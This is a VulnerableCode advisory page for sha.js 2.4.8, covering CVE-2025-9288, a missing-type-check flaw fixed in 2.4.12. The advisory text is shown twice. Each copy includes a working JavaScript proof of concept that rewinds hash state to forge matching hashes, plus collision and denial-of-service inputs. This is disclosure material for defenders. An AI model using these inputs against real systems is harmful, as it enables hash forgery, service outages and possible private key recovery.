VulnerableCode Package Details - pkg:npm/sha.js@2.4.8

Search for packages

Vulnerability	Summary	Fixed by
VCID-eraj-dyxs-xkfd Aliases: CVE-2025-9288 GHSA-95m3-7q98-8xr5	sha.js is missing type checks leading to hash rewind and passing on crafted data ### Summary This is the same as [GHSA-cpq7-6gpm-g9rc](https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc) but just for `sha.js`, as it has its own implementation. Missing input type checks can allow types other than a well-formed `Buffer` or `string`, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour. ### Details See PoC ### PoC ```js const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]]) const sha = require('sha.js') const { randomBytes } = require('crypto') const sha256 = (...messages) => { const hash = sha('sha256') messages.forEach((m) => hash.update(m)) return hash.digest('hex') } const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe') const receivedMessage = JSON.parse(payload) // e.g. over network, whatever console.log(sha256(...validMessage)) console.log(sha256(...receivedMessage)) console.log(receivedMessage[0]) ``` Output: ``` 638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4 638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4 Hashed input means safe ``` Or just: ```console > require('sha.js')('sha256').update('foo').digest('hex') '2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae' > require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex') '2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae' ``` ### Impact 1. Hash state rewind on `{length: -x}`. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash. 2. Value miscalculation, e.g. a collision is generated by `{ length: buf.length, ...buf, 0: buf[0] + 256 }` This will result in the same hash as of `buf`, but can be treated by other code differently (e.g. bn.js) 4. DoS on `{length:'1e99'}` 5. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration)	2.4.12 Affected by 0 other vulnerabilities.

Vulnerability

Summary

Fixed by

VCID-eraj-dyxs-xkfd
Aliases:
CVE-2025-9288
GHSA-95m3-7q98-8xr5

sha.js is missing type checks leading to hash rewind and passing on crafted data ### Summary This is the same as [GHSA-cpq7-6gpm-g9rc](https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc) but just for `sha.js`, as it has its own implementation. Missing input type checks can allow types other than a well-formed `Buffer` or `string`, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour. ### Details See PoC ### PoC ```js const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]]) const sha = require('sha.js') const { randomBytes } = require('crypto') const sha256 = (...messages) => { const hash = sha('sha256') messages.forEach((m) => hash.update(m)) return hash.digest('hex') } const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe') const receivedMessage = JSON.parse(payload) // e.g. over network, whatever console.log(sha256(...validMessage)) console.log(sha256(...receivedMessage)) console.log(receivedMessage[0]) ``` Output: ``` 638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4 638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4 Hashed input means safe ``` Or just: ```console > require('sha.js')('sha256').update('foo').digest('hex') '2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae' > require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex') '2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae' ``` ### Impact 1. Hash state rewind on `{length: -x}`. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash. 2. Value miscalculation, e.g. a collision is generated by `{ length: buf.length, ...buf, 0: buf[0] + 256 }` This will result in the same hash as of `buf`, but can be treated by other code differently (e.g. bn.js) 4. DoS on `{length:'1e99'}` 5. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration)

2.4.12
Affected by 0 other vulnerabilities.

Vulnerability	Summary	Aliases
This package is not known to fix vulnerabilities.

Vulnerability

Summary

Aliases

This package is not known to fix vulnerabilities.

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-04-16T23:36:07.393837+00:00	GitLab Importer	Affected by	VCID-eraj-dyxs-xkfd	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/sha.js/CVE-2025-9288.yml	38.4.0
2026-04-12T00:56:38.295386+00:00	GitLab Importer	Affected by	VCID-eraj-dyxs-xkfd	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/sha.js/CVE-2025-9288.yml	38.3.0
2026-04-03T01:04:51.161619+00:00	GitLab Importer	Affected by	VCID-eraj-dyxs-xkfd	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/sha.js/CVE-2025-9288.yml	38.1.0